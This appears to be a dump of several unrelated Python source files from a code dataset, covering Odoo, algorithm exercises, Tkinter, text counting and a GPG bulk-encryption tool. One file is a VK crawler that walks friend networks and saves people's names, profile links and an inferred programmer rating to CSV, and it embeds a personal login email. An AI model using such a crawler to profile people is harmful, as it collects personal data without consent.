ignore_errors=True)\n\n# this is barely a sanity test, more to be added\nif __name__ == \"__main__\":\n\tmain()\n\n# vim: tabstop=4 noexpandtab shiftwidth=4 softtabstop=4 ff=unix fileencoding=utf-8\n","repo_name":"mhxie/Recloud","sub_path":"core/adaptor/bypy/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20437528675","text":"from collections import OrderedDict\n\nfrom odoo import http, _\nfrom odoo.addons.portal.controllers.portal import CustomerPortal, get_records_pager\nfrom odoo.http import request\n\n\nclass CustomerPortal(CustomerPortal):\n\n def _prepare_portal_layout_values(self):\n values = super(CustomerPortal , self)._prepare_portal_layout_values()\n # domain is needed to hide non portal project for employee\n # portal users can't see the privacy_visibility, fetch the domain for them in sudo\n subscription_count = request.env['omixbilling.subscription'].search_count([])\n values.update({\n 'subscription_count': subscription_count,\n })\n return values\n\n @http.route(['/my/subscriptions', '/my/subscriptions/page/'], type='http', auth=\"user\", website=True)\n def my_subscriptions(self, page=1, date_begin=None, date_end=None, project=None, sortby=None, **kw):\n values = self._prepare_portal_layout_values()\n\n sortings = {\n 'date': {'label': _('Newest'), 'order': 'create_date desc'},\n 'name': {'label': _('Name'), 'order': 'name'},\n }\n\n domain = ([])\n order = sortings.get(sortby, sortings['date'])['order']\n\n # archive groups - Default Group By 'create_date'\n archive_groups = self._get_archive_groups('omixbilling.subscription', [('active', '=', False)])\n # pager\n pager = request.website.pager(\n url=\"/my/subscriptions\",\n url_args={'date_begin': date_begin, 'date_end': date_end},\n total=values['subscription_count'],\n page=page,\n step=self._items_per_page\n )\n # content according to pager and archive selected\n subscriptions = request.env['omixbilling.subscription'].search(domain, order=order, limit=self._items_per_page, offset=pager['offset'])\n\n values.update({\n 'date': date_begin,\n 'date_end': date_end,\n 'sortings': sortings,\n 'sortby': sortby,\n 'subscriptions': subscriptions,\n 'page_name': 'subscription',\n 'archive_groups': archive_groups,\n 'default_url': '/my/subscriptions',\n 'pager': pager\n })\n return request.render(\"omixbilling.my_subscriptions\", values)\n\n @http.route(['/my/subscriptions/'], type='http', auth=\"user\", 
website=True)\n def my_subscriptions_subscription(self, subscription_id=None, **kw):\n subscription = request.env['omixbilling.subscription'].browse(subscription_id)\n return request.render(\"omixbilling.my_subscriptions_subscription\", {'subscription': subscription})\n\n","repo_name":"mustafirus/odoo_my_modules","sub_path":"omixbilling/controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71228621227","text":"#Leetcode https://leetcode.com/problems/climbing-stairs/\n\n\n# Big O \n# Time - O(n)\n# Space - O(n)\nclass Solution:\n\n def climbStairs(self, n):\n \n steps = [0] * (n + 1)\n\n if n == 0:\n return 0\n\n if n == 1:\n return 1\n\n\n steps[0] = 1\n steps[1] = 2\n\n for i in range(2, n + 1):\n steps[i] = steps[i - 1] + steps[i - 2]\n\n return steps[n - 1]\n \nsolution = Solution()\nprint(solution.climbStairs(45))","repo_name":"felipedss/algorithms","sub_path":"python/dynamic-programming/climbing-stairs.py","file_name":"climbing-stairs.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"10375258257","text":"import collections\n\nimport pandas as pd\nimport vk_api\n\nimport analysis\n\nvk = None\ntukallo_id = '125376958'\n\nSCORE_THRESHOLD = 4 # score is given from 0 to 10. If score >= threshold => user is a programmer\n\n\ndef get_score(id):\n \"\"\"\n :param id: user_id to get_score for\n :return: (rating: ing, lang_stat: dict), where rating is an int in a range [0; 10]\n depicting assurance, that a user is a programmer,\n lang_stat is user's statistics about programming languages from LANGUAGES\n \"\"\"\n return analysis.analyze_user(id, vk)\n\n\ndef get_max(d: dict):\n maxx = 0\n ans = \"-\"\n for key in d:\n val = d[key]\n if val > maxx:\n ans = key\n maxx = val\n return ans\n\n\ndef walk_and_store(start_id=tukallo_id, lang=\"\", limit=100):\n programmers = pd.DataFrame(columns=('id', 'first_name', 'last_name', 'rank', 'language', 'link'))\n\n start = vk.users.get(user_ids=start_id)[0]\n start_user = (start_id, start['first_name'], start['last_name'])\n\n observed_users = set()\n observed_users.add(start_user)\n\n to_visit = collections.deque()\n to_visit.append(start_user)\n\n # starting bfs\n while len(to_visit) != 0:\n cur_user = to_visit.popleft() # (id, first_name, last_name)\n\n # try to get friends to learn if the account was deleted\n try:\n friends = vk.friends.get(user_id=cur_user[0], fields='first_name,last_name')\n except vk_api.exceptions.ApiError as error_msg:\n continue\n\n # analyze user\n score = get_score(cur_user[0])\n\n link = 'https://vk.com/id' + str(cur_user[0])\n best_lang = get_max(score[1])\n if lang == '':\n if score[0] >= SCORE_THRESHOLD:\n programmers.loc[len(programmers)] = [*cur_user, score[0], best_lang, link]\n elif score[1][lang] > 0:\n programmers.loc[len(programmers)] = [*cur_user, score[0], lang, link]\n\n if len(programmers) >= limit:\n break\n\n for friend in friends['items']:\n friend_t = (friend['id'], friend['first_name'], friend['last_name'])\n if friend_t not in observed_users:\n if friend_t[1] == 'Tukallo':\n print('fucking shit!')\n to_visit.append(friend_t)\n observed_users.add(friend_t)\n\n # bfs is finished, time to save programmers we found\n programmers = programmers.sort_values(by=['rank'], ascending=False)\n programmers.to_csv('processed/' + start_user[1] + start_user[2] + 
str(limit) + lang + \".csv\")\n\n\ndef get_developers(vk_id=tukallo_id, lang='', limit=10):\n \"\"\"\n Method finds all the developers in a specified programming language close to specified user_id\n :param vk_id: user to start search from\n :param lang: language to filter developers with. If lang == '', then all the developers are reported\n without filtering by language\n :param limit: number of developers to report\n :return: output is written to console & csv file\n \"\"\"\n login, password = \"alex.tukallo@gmail.com\", \"\"\n vk_session = vk_api.VkApi(login=login)\n\n try:\n vk_session.auth()\n except vk_api.AuthError as error_msg:\n print(error_msg)\n return\n\n print(\"authorized\")\n\n global vk\n vk = vk_session.get_api()\n\n walk_and_store(vk_id, lang, limit)\n\n\nif __name__ == '__main__':\n # get all the developers in all the programming languages:\n get_developers(limit=40) # Tukallo\n get_developers(vk_id='53448', limit=40) # Andrey Novoselsky\n get_developers(vk_id='33251758', limit=5) # Yuriy Tikhonov\n\n # get all the developers for a specific programming language:\n get_developers(lang='python', limit=10) # Tukallo\n get_developers(vk_id='53448', lang='java', limit=10) # Andrey Novoselsky\n get_developers(vk_id='225270855', lang='php', limit=1) # Ivan Revin\n","repo_name":"atukallo/VKDevelopers","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18194889198","text":"\n# Tkinter imports\nfrom tkinter import Canvas\nfrom tkinter import CENTER\nfrom tkinter import NW\nfrom tkinter.font import Font\n\n# Python imports\nfrom typing import Tuple, Dict\n\n# Package imports\nfrom ..base import BoxCollider\nfrom ..base import GameObject\nfrom ..base import fonts\n\nfrom ..common import convertRGBToHex\n\nclass Text(GameObject):\n '''\n Base class for text gameObjects. \n\n Parameters\n ----------\n canvas - tkinter canvas object.\n\n position - where to place the text object on the screen (0-1)\n\n text - text string of what to display\n\n font - Name of a font. \"Courier\" \"Times New Roman\" etc.\n\n fontSize - int for font size. See fonts.py file to see the minimum and maximum sizes.\n\n textColor - (r, g, b) float values from (0, 1). 
Color of the text.\n\n    anchor - tkinter anchor value (NW, S, CENTER, etc.)\n    '''\n\n    def __init__(\n        self,\n        canvas: Canvas,\n        position: Tuple[float],\n        text: str,\n        font: str = \"Courier\",\n        fontSize: int = 12,\n        textColor: Tuple[float, float, float] = (1.0, 1.0, 1.0),\n        anchor: str = CENTER,\n        **kwargs\n    ):\n        \n        # Initialize the gameobject\n        GameObject.__init__(self, canvas, **kwargs)\n\n        # The text object needs to remember its initial font size so it can be resized appropriately\n        self.initialFontSize: int = fontSize\n        self.currentFontSize: int = fontSize\n\n        # Set the values for text\n        self.text: str = text\n        self.font: Dict[int, Font] = fonts.FONTS[font]\n        self.textColor: str = convertRGBToHex(textColor)\n\n        # Set up the collider for the text.\n        self.collider: BoxCollider = BoxCollider(position[0], position[1], 0, 0, anchor = anchor)\n\n        # Remember the original position\n        self.originalPosition: Tuple[float] = position\n        \n        # Create textID\n        self.textID: int = 0\n\n    def updateText(self):\n        '''\n        Recompute the collider's position and size from the current font\n        metrics, normalized to the screen dimensions.\n        '''\n\n        self.collider.x = self.originalPosition[0]\n        self.collider.y = self.originalPosition[1]\n\n        self.collider.w = self.font[self.currentFontSize].measure(self.text) / self.screenWidth\n        self.collider.h = self.font[self.currentFontSize].metrics()[\"linespace\"] / self.screenHeight\n        self.collider.adjustPoints()\n\n    def _setup(self):\n        self.updateText()\n\n    def _draw(self):\n\n        if self.textID != 0:\n            self.canvas.delete(self.textID)\n        \n        self.textID = self.canvas.create_text(\n            self.collider.x * self.screenWidth,\n            self.collider.y * self.screenHeight,\n            text = self.text,\n            fill = self.textColor,\n            anchor = NW, # Anchor is always NW because the collider normalizes all points to be this way\n            font = self.font[self.currentFontSize]\n        )\n
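    # A tiny sketch (not called anywhere) of the normalization updateText()\n    # performs with font.measure()/metrics(); the pixel numbers a real font\n    # returns will differ:\n    @staticmethod\n    def _normalizedExtentSketch(pixelW: float, pixelH: float, screenW: float, screenH: float):\n        # e.g. a 120x16 px string on an 800x600 canvas -> (0.15, 0.0266...)\n        return pixelW / screenW, pixelH / screenH\n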
\n\n    def _resize(self):\n        '''\n        Resize the text according to the new screen width and height.\n        '''\n\n        # May need to create different sized text as the size is adjusted. Do this here.\n        textSize = int(self.initialFontSize * self.screenWidth / self.initialScreenWidth)\n\n        # Don't let the text be resized larger or smaller than the available text sizes.\n        if textSize < fonts.SMALLEST_FONT_SIZE:\n            textSize = fonts.SMALLEST_FONT_SIZE\n        if textSize > fonts.LARGEST_FONT_SIZE:\n            textSize = fonts.LARGEST_FONT_SIZE\n\n        self.currentFontSize = textSize\n\n        # Now call all the canvas methods necessary\n        self.updateText()\n    \n    def _delete(self):\n        '''\n        Remove all the IDs from the canvas\n        '''\n\n        self.canvas.delete(self.textID)","repo_name":"flywinged/TkGE","sub_path":"src/objects/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"45131798619","text":"import re\n\n\n# function that builds a list of all the distinct words, given a file and a word list\ndef check_words_on_files(file_name, vocabulary, sequence_words):\n    with open(file_name, 'r') as file:\n        for line in file:\n            line_spread = []\n            for line_iteration in line.split():\n                line_spread += line_iteration.split('-')\n            for index, word in enumerate(line_spread):\n                if sequence_words == 2:\n                    if index < len(line_spread) - 1:\n                        word_test = re.sub('\\W+', '', word).lower()\n                        word_test_next = re.sub('\\W+', '', line_spread[index + 1]).lower()\n                        word_test_if = word_test + ' ' + word_test_next\n                        if word_test_if not in vocabulary:\n                            vocabulary.append(word_test + ' ' + word_test_next)\n                else:\n                    word_test = re.sub('\\W+', '', word).lower()\n                    if word_test not in vocabulary:\n                        vocabulary.append(word_test)\n    return vocabulary\n\n\ndef file_to_string(file_name, sequence_words):\n    string_return = []\n    with open(file_name, 'r') as file:\n        for line in file:\n            line_spread = []\n            for line_iteration in line.split():\n                line_spread += line_iteration.split('-')\n            for index, word in enumerate(line_spread):\n                if sequence_words == 2:\n                    if index < len(line_spread) - 1:\n                        word_test = re.sub('\\W+', '', word).lower()\n                        word_test_next = re.sub('\\W+', '', line_spread[index + 1]).lower()\n                        string_return.append(word_test + ' ' + word_test_next)\n                else:\n                    word_test = re.sub('\\W+', '', word).lower()\n                    string_return.append(word_test)\n    return string_return\n\n\ndef count_words_on_file(file_name, words_list, sequence_words):\n    list_of_counted_words = []\n    words_in_file = file_to_string(file_name, sequence_words)\n    for word_to_count in words_list:\n        list_of_counted_words.append(words_in_file.count(word_to_count))\n    return list_of_counted_words\n
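\n\n# Aside: collections.Counter from the standard library does this kind of word\n# counting in a single pass (a sketch, not the approach used above):\nfrom collections import Counter\ndef count_words_sketch(text):\n    return Counter(re.sub('\\W+', ' ', text).lower().split())\nassert count_words_sketch('a b-a')['a'] == 2\n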
\n\nwords = check_words_on_files('text1.txt', [], 1)\nwords = check_words_on_files('text2.txt', words, 1)\nwords_text1 = check_words_on_files('text1.txt', [], 1)\nwords_text2 = check_words_on_files('text2.txt', [], 1)\nlist_words1 = count_words_on_file('text1.txt', words, 1)\nlist_words2 = count_words_on_file('text2.txt', words, 1)\n\nprint('\\n=== PALAVRAS ISOLADAS ===')\nprint('Vocabulário')\nprint('Texto 1: ', words_text1)\nprint('Texto 2: ', words_text2)\nprint('Texto 1 e 2: ', words)\nprint('Vetor de palavras')\nprint('Texto 1: ', list_words1)\nprint('Texto 2: ', list_words2)\n\nprint('\\n=== PALAVRAS EM SEQUENCIA ===')\nwords_2seq = check_words_on_files('text1.txt', [], 2)\nwords_2seq = check_words_on_files('text2.txt', words_2seq, 2)\nwords_text1_2seq = check_words_on_files('text1.txt', [], 2)\nwords_text2_2seq = check_words_on_files('text2.txt', [], 2)\nlist_words1_2seq = count_words_on_file('text1.txt', words_2seq, 2)\nlist_words2_2seq = count_words_on_file('text2.txt', words_2seq, 2)\n\nprint('Vocabulário')\nprint('Texto 1: ', words_text1_2seq)\nprint('Texto 2: ', words_text2_2seq)\nprint('Texto 1 e 2: ', words_2seq)\nprint('Vetor de palavras')\nprint('Texto 1: ', list_words1_2seq)\nprint('Texto 2: ', list_words2_2seq)","repo_name":"armonova/proof-cinnec","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"20637352637","text":"from typing import List\nimport collections\n\nclass Solution:\n    def findItinerary(self, tickets: List[List[str]]) -> List[str]:\n        graph = collections.defaultdict(list)\n        for a, b in sorted(tickets):\n            graph[a].append(b)\n\n        route, stack = [], ['JFK']\n        while stack:\n            while graph[stack[-1]]:\n                print(f'graph[stack[-1]: {graph[stack[-1]]}')\n                stack.append(graph[stack[-1]].pop(0))\n                print(f'stack : {stack}')\n            print(f'route : {route}')\n            route.append(stack.pop())\n\n        return route[::-1]\n\nprint(Solution().findItinerary([[\"JFK\", \"KUL\"], [\"JFK\", \"NRT\"], [\"NRT\", \"JFK\"]]))\n\n","repo_name":"PARKINHYO/Algorithm","sub_path":"python algorithm interview/12장 그래프/일정 재구성 - stack.py","file_name":"일정 재구성 - stack.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} {"seq_id":"2525491244","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author : WeiDongcheng @tonse\n@Time : 2022/10/17 18:05\n@File : xml_util.py\n@Desc : \n\"\"\"\n\n\ndef read_xml(filePath):\n    from bs4 import BeautifulSoup  # requires: pip install beautifulsoup4\n    from lxml import etree  # requires: pip install lxml\n\n    # first read the xml file into memory\n    content_str = \"\"\n    with open(filePath, \"r\", encoding=\"utf8\") as f:\n        line = f.readline()\n        content_str += line\n        while line:\n            line = f.readline()\n            content_str += line\n    xml_tree = BeautifulSoup(content_str, \"lxml-xml\")  # parse the string into a bs4 xml object\n    datasource = xml_tree.findAll(\"datasource\")\n    source_0 = datasource[0].findAll(\"source\")\n    print(source_0[0])  # found it\n    print(source_0[0][\"name\"] + \" = \" + source_0[0][\"value\"])  # get the speed value, prints speed_value = 0\n\n\nif __name__ == \"__main__\":\n    print(\"start ...\")\n    read_xml(r\"V3_master_bp.xml\")\n    print(\"end ...\")\n","repo_name":"TonsenWei/pyhelper","sub_path":"src/examples/xml/xml_util.py","file_name":"xml_util.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"21523253091","text":"def dfs(graph, v):\n    stack=[] \n    discovered=set()\n    count=0\n    stack.append((v, count))\n    countall=0\n    while stack:\n        (v, count)=stack.pop()\n        countall+=count\n        if v not in discovered:\n            discovered.add(v)\n            if v in graph:\n                for w in graph[v]:\n                    stack.append((w, count+1))\n    return countall\n\ndef dfs2(graph, source, target):\n    stack=[] \n    discovered=set()\n    count=0\n    stack.append((source, count))\n    countList=[]\n    while stack:\n        (v, count)=stack.pop()\n        if v == target:\n            countList.append(count)\n            continue\n        if v not in discovered:\n            discovered.add(v)\n            if v in graph:\n                for w in graph[v]:\n                    stack.append((w, count+1))\n    return min(countList)\n
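\n# Aside: the list-as-stack/queue pattern above works, but list.pop(0) is O(n);\n# collections.deque gives O(1) pops (a standalone sketch, hypothetical graph):\nfrom collections import deque\ndef bfs_total_depth_sketch(graph, root):\n    q, seen = deque([(root, 0)]), {root}\n    total = 0\n    while q:\n        node, depth = q.popleft()\n        total += depth\n        for nxt in graph.get(node, []):\n            if nxt not in seen:\n                seen.add(nxt)\n                q.append((nxt, depth + 1))\n    return total\nassert bfs_total_depth_sketch({\"COM\": [\"A\"], \"A\": [\"B\"]}, \"COM\") == 3\n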
\ndef partOne():\n    with open(\"input.txt\", \"r\") as inputFile:\n        graph={}\n        for line in inputFile:\n            A, B= line.strip().split(')')\n            if A in graph:\n                graph[A].append(B)\n            else:\n                graph[A]=[B]\n    print(dfs(graph, \"COM\"))\n\n\n\ndef partTwo():\n    with open(\"input.txt\", \"r\") as inputFile:\n        graph={} \n        for line in inputFile:\n            A, B= line.strip().split(')')\n            if A in graph:\n                graph[A].append(B)\n            else:\n                graph[A]=[B]\n            if B in graph:\n                graph[B].append(A)\n            else:\n                graph[B]=[A]\n\n    pathLen=[]\n    for adjY in graph[\"YOU\"]:\n        for adjS in graph[\"SAN\"]:\n            pathLen.append(dfs2(graph, adjY, adjS))\n    print(min(pathLen))\n\n\nprint(\"Answer for part one: \")\npartOne()\nprint(\"Answer for part two: \")\npartTwo()\n","repo_name":"strogera/AoC2019","sub_path":"Day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"33814516760","text":"import matplotlib.pyplot as plt\nimport polars as pl\nimport pandas as pd\n\n\ndef polars_describe(polars_data):\n    return polars_data.describe()\n\n\ndef get_median(polars_data):\n    return polars_data.median()\n\n\ndef PlotShapeLeng(csv):\n    pd.set_option(\"display.max_columns\", None)\n    polars_data = pl.read_csv(csv)\n    plt.figure(figsize=(10, 6))\n    plt.hist(polars_data[\"Shape_Leng\"], bins=20, edgecolor=\"black\")\n    plt.title(\"Shape_Leng Distribution\")\n    plt.xlabel(\"Shape_Leng\")\n    plt.ylabel(\"Count\")\n    plt.show()\n\ndef PlotShapeArea(csv):\n    pd.set_option(\"display.max_columns\", None)\n    polars_data = pl.read_csv(csv)\n    plt.figure(figsize=(10, 6))\n    plt.hist(polars_data[\"Shape_Area\"], bins=20, edgecolor=\"black\")\n    plt.title(\"Shape_Area Distribution\")\n    plt.xlabel(\"Shape_Area\")\n    plt.ylabel(\"Count\")\n    plt.show() \n","repo_name":"nogibjj/706-Week3-mini-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"24784243351","text":"import cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg = cv2.imread ('C:/Users/Victor Pacheco Garci/Desktop/UPC/2017-18/GDSA/Team5/Farmacia Albinyana/farmacia_albinyana_101.jpg',1)\r\n\r\n#Create the surf object\r\n#Set the Hessian Threshold to 400\r\nsurf = cv2.SURF(10)\r\n\r\n#compute the keypoints and check how many there are\r\nkp, des = surf.detectAndCompute(img,None)\r\nlen(kp)\r\n\r\n#check the current Hessian threshold\r\n#In real cases, it is better to use values between 300 and 500\r\nsurf.hessianThreshold = 400\r\nimg2 = cv2.drawKeypoints(img,kp,None,(255,0,0),0)\r\nplt.imshow(img2),plt.show()","repo_name":"gdsa-upc/PicZam","sub_path":"S3/SURF.py","file_name":"SURF.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"28782966004","text":"# User input values\njmeno = input(\"Tvoje jméno:\", )\nvaha = float(input(\"Tvoje váha (kg):\"))\nvyska = float(input(\"Tvoje výška (m):\"))\njmeno = \"Ty hele,\"\n#vaha = 113\n#vyska = 1.91\n\n# BMI calculation\nbmi = vaha / vyska ** 2\n\n#if height were entered in cm, which would be more natural\n#bmi = vaha / (vyska / 100) ** 2)\n\n# Create a variable \"kategorie\" to store the verbal BMI rating\nif bmi < 18.5:\n    kategorie = \"což znamená, že brzo pojdeš, protože nežereš!\"\nelif bmi >= 18.5 and bmi <= 25:\n    kategorie = \"seš hubenej, běž se najest...\"\nelif bmi > 25 and bmi <= 30:\n    kategorie = \"takže jsi v pohodě, normální chlap\"\nelif bmi > 30 and bmi <= 40:\n    kategorie = \", nežer tolik\"\nelse:\n    kategorie = \", seš tlustej jak prase, dělej se sebou něco!\"\n
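\n# Aside: an if/elif ladder like the one above can also be written data-driven\n# (sketch with illustrative bands, not the exact texts used here):\ndef kategorie_sketch(bmi_value, bands):\n    for limit, text in bands:\n        if bmi_value <= limit:\n            return text\n    return bands[-1][1]\nassert kategorie_sketch(22, [(18.5, 'under'), (25, 'normal'), (float('inf'), 'over')]) == 'normal'\n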
\n# Print the answer with the result - so it passes the test\n#print(jmeno, \"Tvoje BMI je\", bmi, kategorie)\n\n# better output\nprint(jmeno, \"Tvoje BMI je\", round(bmi, 1), kategorie)","repo_name":"miraliska/Engeto_projects","sub_path":"ENGETO/02. Podminky_a_metody/Cviceni_02_03_BMI_kalkulacka.py","file_name":"Cviceni_02_03_BMI_kalkulacka.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"42774990154","text":"import argparse\nimport datetime\nimport os\nimport sys\nimport gnupg\n\n\n# Walk directory for files\ndef get_files(path):\n    \"\"\"This function recursively crawls a directory for files\n    and saves them to a list with their full path\n\n    Args:\n        path: The path to a folder of files to perform bulk actions on\n\n    Returns:\n        files: An array of files with their full paths\n\n    \"\"\"\n    files = []  # Instantiate variable for returning list of files\n    # Walk the entire path\n    # Using _ instead of directories makes it a temporary discarded variable\n    # This is more proper and will not ding the linting score\n    for root, _, filenames in os.walk(path):\n        # Look only for files\n        for filename in filenames:\n            # Ignore hidden files\n            if filename[0] != \".\":\n                file = os.path.join(root, filename)\n                files.append(file)\n    return files\n
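\n\n# Aside: pathlib offers a compact equivalent of the os.walk() crawl above,\n# with the same skip-hidden-files rule (a sketch, not used by this script):\ndef get_files_sketch(path):\n    from pathlib import Path\n    return [str(p) for p in Path(path).rglob(\"*\")\n            if p.is_file() and not p.name.startswith(\".\")]\n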
\n\n# Bulk Encrypt Files\ndef gpg_bulk_encrypt(key_emails, delete_flag, path, log_file):\n    \"\"\"This function recursively checks the path provided\n    for all non .gpg files and encrypts them\n\n    Args:\n        key_emails: The list of email(s) belonging to the GPG key(s) involved\n        delete_flag: True or False flag to delete the original file when performing actions\n        path: The path to a folder of files to perform bulk actions on\n        log_file: The open log file that entries are written to\n\n    \"\"\"\n    now = datetime.datetime.now()\n    log_file.write(\"%s: Scanning %s for files\\n\" % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), path))\n    log_file.flush()\n    list_of_files = get_files(path)\n\n    # Instantiate GPG class with agent use\n    gpg = gnupg.GPG(use_agent=True)\n    # Find matching keys\n    matching_keys = gpg.list_keys(secret=True, keys=key_emails)\n\n    # Verify the key provided is a secret key\n    if matching_keys == []:\n        now = datetime.datetime.now()\n        error_msg = \"%s: FATAL ERROR! GPG secret key for %s not found in GPG agent!\" \\\n                    % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), key_emails)\n        log_file.write(error_msg + \"\\n\")\n        log_file.flush()\n        print(error_msg)\n        log_file.close()\n        sys.exit(1)\n\n    # Begin encryption\n    for file in list_of_files:\n        # Do not attempt to encrypt already encrypted files\n        if \".gpg\" not in file:\n            now = datetime.datetime.now()\n            log_message = \"%s: Encrypting %s so only %s can decrypt it!\" \\\n                          % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file, key_emails)\n            log_file.write(log_message + \"\\n\")\n            log_file.flush()\n            print(log_message)\n            with open(file, 'rb') as plain_file:\n                _ = gpg.encrypt_file(  # Using that temporary discarded variable again\n                    file=plain_file,\n                    recipients=key_emails,\n                    armor=False,\n                    always_trust=True,\n                    output=file + \".gpg\")\n            if delete_flag:\n                now = datetime.datetime.now()\n                log_message = \"%s: DELETING %s NOW THAT IT IS ENCRYPTED!\" \\\n                              % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file)\n                log_file.write(log_message + \"\\n\")\n                log_file.flush()\n                print(log_message)\n                os.remove(file)\n        else:\n            now = datetime.datetime.now()\n            log_message = \"%s: Skipping %s because it's a .gpg file and \" \\\n                          \"is probably already encrypted!\" \\\n                          % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file)\n            log_file.write(log_message + \"\\n\")\n            log_file.flush()\n            print(log_message)\n\n\n# Bulk Decrypt Files\ndef gpg_bulk_decrypt(delete_flag, path, log_file):\n    \"\"\"This function recursively checks the path provided\n    for all .gpg files and decrypts them\n\n    Args:\n        delete_flag: True or False flag to delete the original file when performing actions\n        path: The path to a folder of files to perform bulk actions on\n        log_file: The open log file that entries are written to\n\n    \"\"\"\n    now = datetime.datetime.now()\n    log_file.write(\"%s: Scanning %s for files\\n\" % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), path))\n    log_file.flush()\n    list_of_files = get_files(path)\n\n    # Instantiate GPG class with agent use\n    gpg = gnupg.GPG(use_agent=True)\n\n    # Begin decryption\n    for file in list_of_files:\n        # Do not attempt to decrypt a non-encrypted file\n        if \".gpg\" in file:\n            now = datetime.datetime.now()\n            log_message = \"%s: Decrypting %s!\" \\\n                          % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file)\n            log_file.write(log_message + \"\\n\")\n            log_file.flush()\n            print(log_message)\n            with open(file, 'rb') as encrypted_file:\n                _ = gpg.decrypt_file(  # Using that temporary discarded variable again\n                    file=encrypted_file,\n                    always_trust=True,\n                    output=file.replace(\".gpg\", \"\")\n                )\n            if delete_flag:\n                now = datetime.datetime.now()\n                log_message = \"%s: DELETING %s NOW THAT IT IS DECRYPTED!\" \\\n                              % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file)\n                log_file.write(log_message + \"\\n\")\n                log_file.flush()\n                print(log_message)\n                os.remove(file)\n        else:\n            now = datetime.datetime.now()\n            log_message = \"%s: Skipping %s because it's not a .gpg file and \" \\\n                          \"is probably already decrypted!\" \\\n                          % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), file)\n            log_file.write(log_message + \"\\n\")\n            log_file.flush()\n            print(log_message)\n
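\n\n# Aside: the stdlib logging module automates the timestamp prefixes that are\n# hand-rolled above (a sketch; the file name here is illustrative):\ndef logging_setup_sketch(log_path='bulk_gpg_sketch.log'):\n    import logging\n    logging.basicConfig(filename=log_path,\n                        format='%(asctime)s: %(message)s',\n                        datefmt='%m/%d/%Y-%H:%M:%S',\n                        level=logging.INFO)\n    logging.info('Run starting.')\n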
\n\ndef main(action, key_emails, delete_flag, path):\n    \"\"\"The main function where we start logging and call\n    all other functions from\n\n    Args:\n        action: The action to perform (encrypt, or decrypt)\n        key_emails: The list of email(s) belonging to the GPG key(s) involved\n        delete_flag: True or False flag to delete the original file when performing actions\n        path: The path to a folder of files to perform bulk actions on\n\n    \"\"\"\n    # First thing we do is open a log file for writing\n    now = datetime.datetime.now()\n    log_file_name = 'bulk_gpg_%s.log' % (now.strftime(\"%m%d%Y%H%M%S\"))\n    log_file = open(log_file_name, 'a')\n    actions_chosen = \"Run Configuration:\\n\" \\\n                     \"Action: %s\\n\" \\\n                     \"Path: %s\\n\" \\\n                     \"Encryption Key: %s\\n\" \\\n                     \"Delete Originals: %s\" % (action, path, key_emails, delete_flag)\n    log_file.write(\"%s: Run starting.\\n\" % (now.strftime(\"%m/%d/%Y-%H:%M:%S\")))\n    log_file.write(\"%s: %s\\n\" % (now.strftime(\"%m/%d/%Y-%H:%M:%S\"), actions_chosen))\n    log_file.flush()\n    if action == \"encrypt\":\n        gpg_bulk_encrypt(key_emails, delete_flag, path, log_file)\n    else:\n        gpg_bulk_decrypt(delete_flag, path, log_file)\n    log_file.close()\n    sys.exit()\n\n\nif __name__ == '__main__':\n    # This block parses and returns arguments passed in\n    # Assign description to the help doc\n    PARSER = argparse.ArgumentParser(\n        description='A simple Python script that allows you to encrypt/decrypt\\\n                    multiple files in a path without them being zipped into\\\n                    a single encrypted archive.')\n    # Add arguments\n    ACTION = PARSER.add_mutually_exclusive_group(required=True)\n    ACTION.add_argument(\n        '-e', '--encrypt', help=\"Encrypt files\", action='store_true'\n    )\n    ACTION.add_argument(\n        '-d', '--decrypt', help=\"Decrypt files\", action='store_true'\n    )\n    PARSER.add_argument(\n        '-p', '--path', type=str,\n        help='path to directory to encrypt/decrypt', required=True)\n    PARSER.add_argument(\n        '--delete', help='Delete original files after actioned (Optional)',\n        required=False, action='store_true')\n    PARSER.add_argument(\n        '-k', '--keyEmails', type=str, action='append',\n        help='A GPG key email address to encrypt with. '\n             'You can specify this more than once.', required=False)\n    # Array for all arguments passed to script\n    ARGS = PARSER.parse_args()\n    if ARGS.encrypt and ARGS.keyEmails is None:\n        PARSER.error(\"-k/--keyEmail 